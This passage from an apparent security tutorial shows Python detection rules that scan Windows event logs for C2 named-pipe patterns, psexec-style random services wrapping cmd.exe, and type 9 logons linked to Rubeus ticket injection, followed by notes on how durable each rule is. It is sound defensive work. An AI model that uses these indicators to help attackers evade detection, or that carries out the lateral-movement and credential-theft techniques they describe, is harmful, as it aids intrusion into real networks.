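KNOWN_C2_PIPES = (re.compile(r"^\\legit-\d+-pipeu$"), re.compile(r"^\\nerokek\\\d+$"))
# remote-exec psexec installs a service with a random 7-hex-char name whose
# binary path is a cmd.exe /c wrapper (compare "Started service 4845abe").
SCM_RANDOM_NAME = re.compile(r"^[0-9a-f]{7}$")
SCM_CMD_WRAPPER = re.compile(r"^cmd\.exe\s+/c\s", re.IGNORECASE)


def image_basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def check_pipe(ev: dict) -> list[str]:
    findings = []
    name = ev["PipeName"]
    if PSHOST_PIPE.match(name) and image_basename(ev["Image"]) not in POWERSHELL_HOSTS:
        findings.append("PSHost-style pipe created by a non-PowerShell image")
    if any(p.match(name) for p in KNOWN_C2_PIPES):
        findings.append("pipe name matches a known C2 artifact-kit pattern")
    return findings


def check_service(ev: dict) -> list[str]:
    if SCM_RANDOM_NAME.match(ev["ServiceName"]) and SCM_CMD_WRAPPER.match(ev["ImagePath"]):
        return ["random-named service wrapping cmd.exe /c (psexec-style remote execution)"]
    return []


def check_logon(ev: dict) -> list[str]:
    # LOGON_TYPE = 9 (NewCredentials) through the seclogo logon process is what
    # Rubeus createnetonly and runas /netonly produce; rare on servers.
    if ev["LogonType"] == 9 and ev["LogonProcessName"].lower() == "seclogo":
        return ["NewCredentials (type 9) logon: possible injected Kerberos ticket"]
    return []


CHECKS = {17: check_pipe, 7045: check_service, 4624: check_logon}


def run_detections(events: list[dict]) -> list[dict]:
    """Apply the rule for each event type and return one alert per finding."""
    alerts = []
    for ev in events:
        for reason in CHECKS.get(ev["EventID"], lambda _: [])(ev):
            detail = ev.get("PipeName") or ev.get("ServiceName") or ev.get("TargetUserName")
            alerts.append({"host": ev["Computer"], "event": ev["EventID"],
                           "detail": detail, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in run_detections(EVENTS):
        print(alert)
```

The PSHost rule is the durable one: the pipe name is chosen to blend in, so the signal is the mismatch between the name and the image that created it, not the name itself. The artifact-kit pattern is an indicator that only lasts until the next rename, and the type 9 logon rule needs a baseline, since administrators also use runas /netonly.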